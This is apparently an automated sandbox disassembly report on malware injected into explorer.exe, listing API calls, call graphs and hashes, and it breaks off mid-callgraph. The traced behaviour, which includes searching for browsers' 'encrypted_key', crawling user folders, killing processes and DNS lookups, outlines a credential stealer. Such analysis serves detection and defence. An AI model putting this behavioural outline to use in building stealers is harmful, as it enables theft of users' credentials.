                                                      Function 000C2FB1 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 31stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • StrStrIA.SHLWAPI(00000000,"encrypted_key":"), ref: 000C2FC1
                                                      • lstrlen.KERNEL32("encrypted_key":",?,000C3FA8), ref: 000C2FCE
                                                      • StrStrIA.SHLWAPI("encrypted_key":",0011692C), ref: 000C2FDD
                                                        • Part of subcall function 000C190B: lstrlen.KERNEL32(?,?,?,?,00000000,000C2783), ref: 000C192B
                                                        • Part of subcall function 000C190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,000C2783), ref: 000C1930
                                                        • Part of subcall function 000C190B: lstrcat.KERNEL32(00000000,?), ref: 000C1946
                                                        • Part of subcall function 000C190B: lstrcat.KERNEL32(00000000,00000000), ref: 000C194A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$lstrcat
                                                      • String ID: "encrypted_key":"
                                                      • API String ID: 493641738-877455259
                                                      • Opcode ID: c1c111d1c361ea2280c0eef5f7a872ca0a52f29db80e31099fd2fef06207ef3e
                                                      • Instruction ID: 9c6b67dcc6ef624df4736c2e561888b14e3c99406eaee6f665111c1420be8bfd
                                                      • Opcode Fuzzy Hash: c1c111d1c361ea2280c0eef5f7a872ca0a52f29db80e31099fd2fef06207ef3e
                                                      • Instruction Fuzzy Hash: 96E0222260AA682F83A9ABF52D44DCF3EA89F46210305407CF60193513DF938842C2A4
                                                      Function 000EF21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 000C6A81: memset.NTDLL ref: 000C6A9C
                                                      • _aulldiv.NTDLL(?,00000000,?,00000000), ref: 000EF2A1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: _aulldivmemset
                                                      • String ID: %llu$%llu
                                                      • API String ID: 714058258-4283164361
                                                      • Opcode ID: d7441ef4cf18d0029357730f9c5777b07e4775ebdbfb8b08309078aadb0e519f
                                                      • Instruction ID: 733d781762fd89a8af3b4d8a65a072e1762b99422687671c30c8df4c3b8d9cf5
                                                      • Opcode Fuzzy Hash: d7441ef4cf18d0029357730f9c5777b07e4775ebdbfb8b08309078aadb0e519f
                                                      • Instruction Fuzzy Hash: 7721D4726446566BC714AB64CC42FBFB759AF85730F04823DFA25A72C2DB219C118BE1
                                                      Function 000D203C Relevance: 5.3, APIs: 4, Instructions: 274COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _allmul.NTDLL(?,00000000,?), ref: 000D2174
                                                      • _allmul.NTDLL(?,?,?,00000000), ref: 000D220E
                                                      • _allmul.NTDLL(?,00000000,00000000,?), ref: 000D2241
                                                      • _allmul.NTDLL(000C2E26,00000000,?,?), ref: 000D2295
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: _allmul
                                                      • String ID:
                                                      • API String ID: 4029198491-0
                                                      • Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                      • Instruction ID: 7aecc024886d43b95e8348e28dd4becad428794acad02cf143f155fdb2df515e
                                                      • Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                      • Instruction Fuzzy Hash: 64A18D70708701AFD724EF64C881A6EB7E6AFE8704F00482EF65587352EB71ED458B62
                                                      Function 000D78B9 Relevance: 5.2, APIs: 4, Instructions: 227COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: memcpymemset
                                                      • String ID:
                                                      • API String ID: 1297977491-0
                                                      • Opcode ID: c619ea2c298dd9c75116f67c9c0684c188a810f16eda2788c5e90550f24386e1
                                                      • Instruction ID: ce6f6b553f9ce9aef2f833e00a544f58f3f1023c0b2831fe884ef76c5f2cd507
                                                      • Opcode Fuzzy Hash: c619ea2c298dd9c75116f67c9c0684c188a810f16eda2788c5e90550f24386e1
                                                      • Instruction Fuzzy Hash: 5F818D716083149FC354DF28C885A6BBBE5EFD8704F54492EF88A87352E770E905CBA2
                                                      Function 000C190B Relevance: 5.0, APIs: 4, Instructions: 36stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlen.KERNEL32(?,?,?,?,00000000,000C2783), ref: 000C192B
                                                      • lstrlen.KERNEL32(00000000,?,?,?,00000000,000C2783), ref: 000C1930
                                                      • lstrcat.KERNEL32(00000000,?), ref: 000C1946
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 000C194A
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: lstrcatlstrlen
                                                      • String ID:
                                                      • API String ID: 1475610065-0
                                                      • Opcode ID: a7dba3619789455ac5860b3542b82eba2cbc24a0238118d7caf8d9199f850cfb
                                                      • Instruction ID: 7c96ee7986758746c435996a51eed7706ca130184434f2eb8f608aff7d92e415
                                                      • Opcode Fuzzy Hash: a7dba3619789455ac5860b3542b82eba2cbc24a0238118d7caf8d9199f850cfb
                                                      • Instruction Fuzzy Hash: C7E09BA230061C2B472477AE5C94EFF76DCDBD95A53150039F904D3203EE669C0146B0

                                                      Execution Graph

                                                      Execution Coverage:9.3%
                                                      Dynamic/Decrypted Code Coverage:55.1%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:49
                                                      Total number of Limit Nodes:2
                                                      execution_graph 949 637f4 950 63804 949->950 955 6372c 950->955 952 63809 954 63817 952->954 959 622b4 952->959 956 6375a 955->956 957 63777 RegCreateKeyExW 956->957 958 637bc 957->958 958->952 960 622d6 959->960 961 622c8 CreateStreamOnHGlobal 959->961 960->954 961->960 981 6a1e0 982 6a1e6 981->982 985 6a298 982->985 990 6a29d 985->990 986 6a385 LoadLibraryA 986->990 988 6a3e0 VirtualProtect VirtualProtect 989 6a46e 988->989 989->989 990->986 990->988 991 6a248 990->991 992 6a1af 993 6a1bd 992->993 994 6a298 3 API calls 993->994 995 6a1cf 993->995 994->995 962 6a298 967 6a29d 962->967 963 6a385 LoadLibraryA 963->967 965 6a3e0 VirtualProtect VirtualProtect 966 6a46e 965->966 966->966 967->963 967->965 968 6a3d5 967->968 969 63608 974 63458 StrStrIW 969->974 971 6363b 972 63458 4 API calls 971->972 973 6365d 972->973 980 6348f 974->980 975 63523 RegOpenKeyExW 976 635ef 975->976 979 6354d 975->979 976->971 977 635b5 RegEnumKeyExW 978 635e4 RegCloseKey 977->978 977->979 978->976 979->977 980->975 996 63668 997 63458 4 API calls 996->997 998 6369b 997->998 999 63458 4 API calls 998->999 1000 636bd 999->1000 1001 6a1f9 1002 6a228 1001->1002 1004 6a248 1001->1004 1003 6a298 3 API calls 1002->1003 1003->1004

                                                      Callgraph

                                                      • Executed
                                                      • Not Executed
                                                      • Opacity -> Relevance
                                                      • Disassembly available
                                                      callgraph 0 Function_00062E04 8 Function_00061B8C 0->8 42 Function_00061838 0->42 70 Function_00061860 0->70 1 Function_00061405 2 Function_00062700 10 Function_00062688 2->10 2->70 3 Function_00061000 4 Function_00061980 5 Function_0006B00C 6 Function_0006298C 7 Function_0006188C 7->42 8->42 9 Function_00063608 64 Function_00063458 9->64 10->42 11 Function_00062308 12 Function_00061508 13 Function_00062514 28 Function_000623A0 13->28 51 Function_0006234C 13->51 54 Function_00062354 13->54 71 Function_00062360 13->71 80 Function_000623F0 13->80 14 Function_00061B14 14->42 15 Function_00069912 16 Function_00069C92 17 Function_0006B192 18 Function_00061D10 18->42 83 Function_000618F8 18->83 19 Function_00062410 34 Function_000623AC 19->34 19->80 20 Function_00062610 20->42 21 Function_0006971C 22 Function_0006141D 23 Function_0006A298 63 Function_0006A25A 23->63 24 Function_00062498 24->34 47 Function_00062340 24->47 25 Function_000699A7 26 Function_000647A7 27 Function_00061822 29 Function_00061E20 29->4 29->7 29->18 29->42 46 Function_00061C40 29->46 61 Function_000618D0 29->61 68 Function_00061DE0 29->68 29->70 29->83 30 Function_000628A0 30->42 30->70 78 Function_00062774 30->78 31 Function_0006A1AF 31->23 32 Function_0006372C 32->42 32->70 33 Function_000622AC 35 Function_0006272C 36 Function_000630A8 36->2 36->10 36->35 36->36 36->70 82 Function_00062F7C 36->82 84 Function_00062AF8 36->84 37 Function_00069EB4 38 Function_000622B4 39 Function_000614B2 40 Function_00069930 41 Function_000638B0 41->41 41->42 55 Function_00061AD4 41->55 43 Function_00061938 44 Function_00062938 45 Function_00069FC2 48 Function_000629C0 48->10 49 Function_00062BC0 49->2 49->10 49->20 49->35 49->42 49->43 58 Function_00062A54 49->58 49->70 50 Function_000641CF 52 Function_00061A4C 53 Function_000636C8 53->14 66 Function_000621E4 53->66 53->70 74 Function_000618E8 53->74 56 Function_000614D4 57 Function_00061254 58->42 58->70 59 Function_00063254 59->6 59->10 59->35 59->36 59->42 59->44 59->70 60 Function_0006A055 62 Function_00069ADA 64->2 64->10 64->30 64->42 64->48 64->59 64->64 64->70 64->78 65 Function_000641D9 66->29 66->42 66->70 67 Function_0006A1E0 67->23 68->52 69 Function_00061560 70->55 72 Function_0006156C 73 Function_00062B6C 73->13 73->24 75 Function_000622E8 76 Function_00063668 76->64 77 Function_00061576 78->42 78->70 78->78 79 Function_000637F4 79->11 79->32 79->33 79->38 79->53 79->54 79->73 79->75 81 Function_00062570 79->81 80->34 81->28 81->42 81->54 82->0 82->49 82->58 82->70 85 Function_00062EF8 82->85 84->42 85->20 86 Function_00064178 87 Function_0006A1F9 87->23 88 Function_000614F9

                                                      Executed Functions

                                                      Function 000638B0 Relevance: 1.5, APIs: 1, Instructions: 40nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 107 638b0-63907 call 61ad4 call 61838 NtUnmapViewOfSection call 6388c 116 63911-6391a 107->116 117 63909-6390c call 638b0 107->117 117->116
                                                      APIs
                                                      • NtUnmapViewOfSection.NTDLL ref: 000638F2
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.418873401.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_61000_explorer.jbxd
                                                      Similarity
                                                      • API ID: SectionUnmapView
                                                      • String ID:
                                                      • API String ID: 498011366-0
                                                      • Opcode ID: 175f204f98ddab081ce75ab585c860cf335b3b36596ebe57e2ab61619d8d81c0
                                                      • Instruction ID: 07d7c0bebfd5eab35338b42f632c169550439883b7608d4425e9f1fe2b024cbe
                                                      • Opcode Fuzzy Hash: 175f204f98ddab081ce75ab585c860cf335b3b36596ebe57e2ab61619d8d81c0
                                                      • Instruction Fuzzy Hash: F3F0A020F11A080FEAAC77FD685D3A822C2EB59310F900629B516C36D3DC398A458352
                                                      Function 00063458 Relevance: 6.2, APIs: 4, Instructions: 172registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.418873401.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_61000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CloseEnumOpen
                                                      • String ID:
                                                      • API String ID: 1332880857-0
                                                      • Opcode ID: e6d0cc022632efdd4a3c5a8daf3e56bcebce22f91e00e29876c625ce24938a9c
                                                      • Instruction ID: d4483960c43caaeea037d42a9e10a4b875f7596f5693c41f599e3ec46e3d9013
                                                      • Opcode Fuzzy Hash: e6d0cc022632efdd4a3c5a8daf3e56bcebce22f91e00e29876c625ce24938a9c
                                                      • Instruction Fuzzy Hash: 82416C30718F0C4FDB98EF6D94997AAB6E2FBD8341F04456EA14EC3262DE34D9448782
                                                      Function 0006A298 Relevance: 4.8, APIs: 3, Instructions: 252memorylibraryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 41 6a298-6a29b 42 6a2a5-6a2a9 41->42 43 6a2b5 42->43 44 6a2ab-6a2b3 42->44 45 6a2b7 43->45 46 6a29d-6a2a3 43->46 44->43 47 6a2ba-6a2c1 45->47 46->42 49 6a2c3-6a2cb 47->49 50 6a2cd 47->50 49->50 50->47 51 6a2cf-6a2d2 50->51 52 6a2e7-6a2f4 51->52 53 6a2d4-6a2e2 51->53 63 6a2f6-6a2f8 52->63 64 6a30e-6a31c call 6a25a 52->64 54 6a2e4-6a2e5 53->54 55 6a31e-6a339 53->55 54->52 57 6a36a-6a36d 55->57 58 6a372-6a379 57->58 59 6a36f-6a370 57->59 62 6a37f-6a383 58->62 61 6a351-6a355 59->61 65 6a357-6a35a 61->65 66 6a33b-6a33e 61->66 67 6a385-6a39e LoadLibraryA 62->67 68 6a3e0-6a3e9 62->68 69 6a2fb-6a302 63->69 64->42 65->58 70 6a35c-6a360 65->70 66->58 74 6a340 66->74 73 6a39f-6a3a6 67->73 71 6a3ec-6a3f5 68->71 90 6a304-6a30a 69->90 91 6a30c 69->91 75 6a341-6a345 70->75 76 6a362-6a369 70->76 77 6a3f7-6a3f9 71->77 78 6a41a-6a46a VirtualProtect * 2 71->78 73->62 80 6a3a8 73->80 74->75 75->61 81 6a347-6a349 75->81 76->57 83 6a40c-6a418 77->83 84 6a3fb-6a40a 77->84 85 6a46e-6a473 78->85 86 6a3b4-6a3bc 80->86 87 6a3aa-6a3b2 80->87 81->61 89 6a34b-6a34f 81->89 83->84 84->71 85->85 92 6a475-6a484 85->92 88 6a3be-6a3ca 86->88 87->88 95 6a3d5-6a3df 88->95 96 6a3cc-6a3d3 88->96 89->61 89->65 90->91 91->64 91->69 96->73
                                                      APIs
                                                      • LoadLibraryA.KERNEL32 ref: 0006A397
                                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0006A441
                                                      • VirtualProtect.KERNELBASE ref: 0006A45F
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.418873401.0000000000069000.00000040.80000000.00040000.00000000.sdmp, Offset: 00069000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_69000_explorer.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual$LibraryLoad
                                                      • String ID:
                                                      • API String ID: 895956442-0
                                                      • Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                      • Instruction ID: 006bc09559ba58e1e56ca86166064d69eaa2f5b492dea585316237ca25ff1824
                                                      • Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                      • Instruction Fuzzy Hash: 99517D3175892E4BCB24BB7C9CC42F5B3C3F757321B18062AD08AD3385D559D9468B93
                                                      Function 0006372C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 97 6372c-637ba call 61838 RegCreateKeyExW 101 637d6-637f0 call 61860 97->101 102 637bc-637cb 97->102 102->101 106 637cd-637d3 102->106 106->101
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.418873401.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_61000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID: ?
                                                      • API String ID: 2289755597-1684325040
                                                      • Opcode ID: 90b71b727ca288489aec266a13dd0a18d59c7ad321cf10e681fca41da4c5c652
                                                      • Instruction ID: 0175cadc1eaba084e880b185854f7669454e214051596b44bd1488a6f786bdce
                                                      • Opcode Fuzzy Hash: 90b71b727ca288489aec266a13dd0a18d59c7ad321cf10e681fca41da4c5c652
                                                      • Instruction Fuzzy Hash: 9E11B970608B4C8FD750DF69D48865AB7E2FB98305F40062EE489C3321DF34D985CB82
                                                      Function 000622B4 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 119 622b4-622c6 120 622d6-622e6 119->120 121 622c8-622d0 CreateStreamOnHGlobal 119->121 121->120
                                                      APIs
                                                      • CreateStreamOnHGlobal.OLE32 ref: 000622D0
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.418873401.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_61000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CreateGlobalStream
                                                      • String ID:
                                                      • API String ID: 2244384528-0
                                                      • Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                      • Instruction ID: 6c511f69b69d8d3de49810070f3f7e1f5989998c8ca95c8496505d4ba7d4b445
                                                      • Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                      • Instruction Fuzzy Hash: 7AE08C30108B0A8FD798AFBCE4CA07933A1EB9C252B05093EE005CB114D27988C18741

                                                      Execution Graph

                                                      Execution Coverage:15.3%
                                                      Dynamic/Decrypted Code Coverage:96.6%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:233
                                                      Total number of Limit Nodes:7
                                                      execution_graph 1119 826ac lstrlen 1120 826f3 1119->1120 1121 826c4 CryptBinaryToStringA 1119->1121 1121->1120 1122 826d7 1121->1122 1125 829b7 GetProcessHeap RtlAllocateHeap 1122->1125 1124 826e2 CryptBinaryToStringA 1124->1120 1125->1124 1126 8295c VirtualFree 898 8126e CreateFileW 899 816fb Sleep 898->899 900 8129e GetFileSize 898->900 901 816f3 CloseHandle 900->901 902 812b6 900->902 901->899 902->901 916 829b7 GetProcessHeap RtlAllocateHeap 902->916 904 812cd 905 812db ReadFile 904->905 906 816f2 904->906 910 812fe 905->910 906->901 907 816eb 917 82999 907->917 908 81329 SetFilePointer 908->907 914 81351 908->914 910->907 910->908 911 81374 RtlMoveMemory 911->914 912 813a3 ReadFile 912->914 913 81c39 26 API calls 913->914 914->907 914->911 914->912 914->913 915 81972 29 API calls 914->915 915->914 916->904 922 827e2 VirtualQuery 917->922 920 829b5 920->906 921 829a5 GetProcessHeap HeapFree 921->920 923 827f9 922->923 923->920 923->921 924 8118f 925 81192 924->925 932 8255c 925->932 928 8255c 16 API calls 929 811b9 928->929 930 8255c 16 API calls 929->930 931 811c6 930->931 947 829b7 GetProcessHeap RtlAllocateHeap 932->947 934 8257a lstrcatW PathAppendW 935 8265d 934->935 936 825a2 FindFirstFileW 934->936 938 82999 3 API calls 935->938 936->935 937 825b9 936->937 939 825bd RtlZeroMemory 937->939 941 8263e FindNextFileW 937->941 942 8260f lstrcatW PathAppendW 937->942 945 825df lstrcatW PathAppendW 937->945 946 8255c 5 API calls 937->946 940 811ac 938->940 939->937 940->928 941->939 944 82652 FindClose 941->944 942->941 943 82627 StrStrIW 942->943 943->937 943->941 944->935 945->937 945->941 946->937 947->934 948 81000 949 81010 948->949 950 81007 948->950 952 81016 950->952 953 827e2 VirtualQuery 952->953 954 8101e 953->954 955 81022 954->955 960 829b7 GetProcessHeap RtlAllocateHeap 954->960 955->949 957 8102e RtlMoveMemory NtUnmapViewOfSection 961 8104f 957->961 960->957 1000 829b7 GetProcessHeap RtlAllocateHeap 961->1000 963 8105c 1001 829b7 GetProcessHeap RtlAllocateHeap 963->1001 965 8106b ExpandEnvironmentStringsW 966 8108c ExpandEnvironmentStringsW 965->966 967 81085 965->967 969 81099 966->969 970 810a0 ExpandEnvironmentStringsW 966->970 1002 8123a 967->1002 971 8123a 24 API calls 969->971 972 810ad 970->972 973 810b4 SHGetSpecialFolderPathW 970->973 971->970 974 8123a 24 API calls 972->974 975 810cc ExpandEnvironmentStringsW 973->975 976 810c5 973->976 974->973 978 810d9 975->978 979 810e0 ExpandEnvironmentStringsW 975->979 977 8123a 24 API calls 976->977 977->975 1009 811cc 978->1009 981 810ed 979->981 982 810f4 ExpandEnvironmentStringsW 979->982 1024 81192 981->1024 984 81108 ExpandEnvironmentStringsW 982->984 985 81101 982->985 987 8111c ExpandEnvironmentStringsW 984->987 988 81115 984->988 986 81192 16 API calls 985->986 986->984 990 81129 987->990 991 81130 987->991 989 81192 16 API calls 988->989 989->987 993 81192 16 API calls 990->993 992 82999 3 API calls 991->992 994 81137 992->994 993->991 995 81187 ExitProcess 994->995 1031 829b7 GetProcessHeap RtlAllocateHeap 994->1031 997 8114e 998 8117f 997->998 999 81158 wsprintfA 997->999 998->995 999->998 999->999 1000->963 1001->965 1032 8274a CreateToolhelp32Snapshot 1002->1032 1005 8255c 16 API calls 1006 8125b 1005->1006 1007 8255c 16 API calls 1006->1007 1008 81268 1007->1008 1008->966 1010 8255c 16 API calls 1009->1010 1011 811e6 1010->1011 1012 8255c 16 API calls 1011->1012 1013 811f3 1012->1013 1014 8255c 16 API calls 1013->1014 1015 81200 1014->1015 1016 8255c 16 API calls 1015->1016 1017 8120d 1016->1017 1018 8255c 16 API calls 1017->1018 1019 8121a 1018->1019 1020 8255c 16 API calls 1019->1020 1021 81227 1020->1021 1022 8255c 16 API calls 1021->1022 1023 81234 1022->1023 1023->979 1025 8255c 16 API calls 1024->1025 1026 811ac 1025->1026 1027 8255c 16 API calls 1026->1027 1028 811b9 1027->1028 1029 8255c 16 API calls 1028->1029 1030 811c6 1029->1030 1030->982 1031->997 1033 81249 1032->1033 1034 82765 Process32First 1032->1034 1033->1005 1035 827ae 1034->1035 1036 8277f lstrcmpi 1035->1036 1037 827b2 CloseHandle 1035->1037 1038 827a0 Process32Next 1036->1038 1039 82795 1036->1039 1037->1033 1038->1035 1041 827be OpenProcess 1039->1041 1042 827e0 1041->1042 1043 827d0 TerminateProcess CloseHandle 1041->1043 1042->1038 1043->1042 1048 82013 1049 82029 lstrlen 1048->1049 1050 82036 1048->1050 1049->1050 1059 829b7 GetProcessHeap RtlAllocateHeap 1050->1059 1052 8203e lstrcat 1053 8207a 1052->1053 1054 82073 lstrcat 1052->1054 1060 820a7 1053->1060 1054->1053 1057 82999 3 API calls 1058 8209d 1057->1058 1059->1052 1094 82415 1060->1094 1064 820d4 1099 82938 lstrlen MultiByteToWideChar 1064->1099 1066 820e3 1100 824cc RtlZeroMemory 1066->1100 1069 82135 RtlZeroMemory 1071 8216a 1069->1071 1070 82999 3 API calls 1072 8208a 1070->1072 1073 823f7 1071->1073 1077 82198 1071->1077 1102 8243d 1071->1102 1072->1057 1073->1070 1075 823dd 1075->1073 1076 82999 3 API calls 1075->1076 1076->1073 1077->1075 1111 829b7 GetProcessHeap RtlAllocateHeap 1077->1111 1079 82268 wsprintfW 1080 8228e 1079->1080 1084 822fb 1080->1084 1112 829b7 GetProcessHeap RtlAllocateHeap 1080->1112 1082 822c8 wsprintfW 1082->1084 1083 823ba 1085 82999 3 API calls 1083->1085 1084->1083 1113 829b7 GetProcessHeap RtlAllocateHeap 1084->1113 1087 823ce 1085->1087 1087->1075 1088 82999 3 API calls 1087->1088 1088->1075 1089 82346 1090 823b3 1089->1090 1114 8296b VirtualAlloc 1089->1114 1091 82999 3 API calls 1090->1091 1091->1083 1093 823a0 RtlMoveMemory 1093->1090 1095 820c6 1094->1095 1096 8241f 1094->1096 1098 829b7 GetProcessHeap RtlAllocateHeap 1095->1098 1115 82818 lstrlen lstrlen 1096->1115 1098->1064 1099->1066 1101 820f3 1100->1101 1101->1069 1101->1073 1103 824ab 1102->1103 1105 8244a 1102->1105 1103->1077 1104 8244e DnsQuery_W 1104->1105 1105->1103 1105->1104 1106 8248d DnsFree inet_ntoa 1105->1106 1106->1105 1107 824ad 1106->1107 1117 829b7 GetProcessHeap RtlAllocateHeap 1107->1117 1109 824b7 1118 82938 lstrlen MultiByteToWideChar 1109->1118 1111->1079 1112->1082 1113->1089 1114->1093 1116 82839 1115->1116 1116->1095 1117->1109 1118->1103 1044 89d24 1045 89caf 1044->1045 1046 89f00 VirtualProtect VirtualProtect 1045->1046 1047 89ec9 1045->1047 1046->1047 1047->1047 1127 818f4 CreateFileW 1128 81919 GetFileSize 1127->1128 1129 8196d 1127->1129 1130 81929 1128->1130 1131 81965 CloseHandle 1128->1131 1130->1131 1141 829b7 GetProcessHeap RtlAllocateHeap 1130->1141 1131->1129 1133 81936 ReadFile 1134 8194b 1133->1134 1135 8195d 1133->1135 1142 81c39 1134->1142 1136 82999 3 API calls 1135->1136 1138 81964 1136->1138 1138->1131 1141->1133 1155 829b7 GetProcessHeap RtlAllocateHeap 1142->1155 1144 81c50 RtlMoveMemory 1145 81e36 1144->1145 1149 81c65 1144->1149 1147 81db2 RtlMoveMemory RtlZeroMemory StrStrIA 1148 81deb StrStrIA 1147->1148 1147->1149 1148->1149 1150 81df7 StrStrIA 1148->1150 1149->1145 1151 82999 3 API calls 1149->1151 1156 829b7 GetProcessHeap RtlAllocateHeap 1149->1156 1157 81e44 1149->1157 1150->1149 1152 81e03 StrStrIA 1150->1152 1151->1149 1152->1149 1153 81e0f StrStrIA 1152->1153 1153->1149 1155->1144 1156->1147 1158 81e5b lstrlen CharLowerBuffA 1157->1158 1163 81ec7 1157->1163 1159 81e75 1158->1159 1161 81e9d 1158->1161 1160 81e7f lstrcmpi 1159->1160 1159->1161 1160->1159 1160->1163 1161->1163 1166 81ece StrStrIA 1161->1166 1163->1149 1165 82692 lstrlen RtlMoveMemory 1165->1163 1167 81ef5 RtlMoveMemory RtlMoveMemory StrStrIA 1166->1167 1168 81eb3 1166->1168 1167->1168 1169 81f37 StrStrIA 1167->1169 1168->1163 1168->1165 1169->1168 1170 81f4a StrStrIA 1169->1170 1170->1168 1171 81f5d lstrlen 1170->1171 1171->1168 1172 81f6a 1171->1172 1172->1168 1173 81f9b lstrlen 1172->1173 1173->1168 1173->1172 1174 89cf6 1176 89caf 1174->1176 1175 89ec9 1175->1175 1176->1174 1176->1175 1177 89f00 VirtualProtect VirtualProtect 1176->1177 1177->1175

                                                      Callgraph

                                                      • Executed
                                                      • Not Executed
                                                      • Opacity -> Relevance
                                                      • Disassembly available
                                                      callgraph 0 Function_00088F09 1 Function_0008170B 2 Function_0008490B 3 Function_0008380C 4 Function_00089B0E 5 Function_0008560F 6 Function_00081000 12 Function_00081016 6->12 7 Function_00082818 8 Function_00081810 9 Function_00084A10 10 Function_00082013 70 Function_00082999 10->70 82 Function_000820A7 10->82 88 Function_000829B7 10->88 11 Function_00082415 11->7 35 Function_0008104F 12->35 12->88 106 Function_000827E2 12->106 13 Function_00088816 14 Function_00088F16 15 Function_00082917 16 Function_00089028 17 Function_0008892B 18 Function_00088E2C 19 Function_0008992D 20 Function_00089420 21 Function_00082723 22 Function_00089823 23 Function_00089D24 24 Function_00082938 25 Function_00081C39 39 Function_00081E44 25->39 25->70 25->88 110 Function_00081FFB 25->110 26 Function_0008123A 32 Function_0008274A 26->32 42 Function_0008255C 26->42 27 Function_0008493B 28 Function_0008243D 28->24 28->88 29 Function_0008373E 30 Function_00089635 31 Function_00088F36 85 Function_000827BE 32->85 33 Function_00088B4C 34 Function_0008374D 35->26 35->70 72 Function_00081192 35->72 35->88 91 Function_000811CC 35->91 36 Function_00088F40 37 Function_00089040 38 Function_00089543 92 Function_00081ECE 39->92 111 Function_000826FC 39->111 40 Function_00088D46 41 Function_00083547 42->21 42->42 42->70 42->88 43 Function_0008295C 44 Function_0008185C 45 Function_0008875C 46 Function_00088A5F 47 Function_00088A50 48 Function_00088D52 49 Function_00088756 50 Function_00089456 51 Function_00089057 52 Function_00089169 53 Function_0008296B 54 Function_0008126E 54->1 54->8 54->25 54->44 64 Function_00081972 54->64 54->70 54->88 102 Function_000818EA 54->102 55 Function_0008946E 56 Function_00088961 57 Function_00088D61 58 Function_00088862 59 Function_00088B62 60 Function_00083565 61 Function_00082866 62 Function_00084A7A 63 Function_0008967E 64->15 64->39 64->70 64->88 64->110 65 Function_00088E77 66 Function_0008118F 66->42 67 Function_00088681 68 Function_00089182 69 Function_00083685 70->106 71 Function_0008949B 72->42 73 Function_000892AB 74 Function_000826AC 74->88 75 Function_000890AD 76 Function_000838AE 77 Function_000889AE 78 Function_000886A0 79 Function_00088EA4 80 Function_000891A5 81 Function_000834A6 82->11 82->24 82->28 82->53 82->61 82->70 82->88 90 Function_000824CC 82->90 83 